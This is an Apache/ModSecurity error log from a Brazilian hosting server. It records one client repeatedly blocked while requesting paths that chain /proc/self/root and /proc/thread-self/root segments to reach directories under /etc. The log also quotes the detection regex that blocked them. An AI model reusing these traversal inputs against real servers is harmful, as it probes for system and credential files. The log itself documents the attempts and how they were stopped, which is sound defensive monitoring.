[Wed Mar 18 09:58:16.043259 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:57190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhaOw_le52K8_3pV3XegAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:18.683293 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:57204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhata6ubjKNq_cu4aRTAAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:19.963442 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:58232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqha_u8EFLIOrSqIpv8wgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:21.303252 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:58246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhbeoXxyEfFpUF8f9l8wAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:22.651275 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:58260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhbta6ubjKNq_cu4aRTQAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:23.983531 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:58266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhbwkwaGbbGflqUZAH0gAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:26.444422 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:58276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhcta6ubjKNq_cu4aRUgAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:27.846795 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:58280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhcymAPhZkrhU8w4lk3wAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:30.300896 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:58292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhdvu8EFLIOrSqIpv8zwAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:31.671072 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:55234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhd-yqAr6etmhZHNq3CQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:33.055214 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:55250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqheda6ubjKNq_cu4aRVAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:34.402767 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:55266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhekzinOy1jxa1j4cMDAAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:35.798307 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:55268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhe-oXxyEfFpUF8f9l_QAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:39.799921 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:55280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhf9a6ubjKNq_cu4aRWwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:42.270577 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:51082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhgsdf6f5d65gmYZTMqgAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:43.993073 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:51096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhg-yqAr6etmhZHNq3DQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:48.182304 2026] [mime_magic:error] [pid 15826:tid 140411548894976] (70014)End of file found: [client 57.141.18.52:51468] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:58:49.722911 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:51110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhiSmAPhZkrhU8w4lk9QAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:51.060044 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:58562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhi9a6ubjKNq_cu4aRYgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:52.466592 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:58576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhjPu8EFLIOrSqIpv83gAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:53.741785 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:58588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhjQkwaGbbGflqUZAH4QAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:56.323132 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:58598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhkNa6ubjKNq_cu4aRZQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
